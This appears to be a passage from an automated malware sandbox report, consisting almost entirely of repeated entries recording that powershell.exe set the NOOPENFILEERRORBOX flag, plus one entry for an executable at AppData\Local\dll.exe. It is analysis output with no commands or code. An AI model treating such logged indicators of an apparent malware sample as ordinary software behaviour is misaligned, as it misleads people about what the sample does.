Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
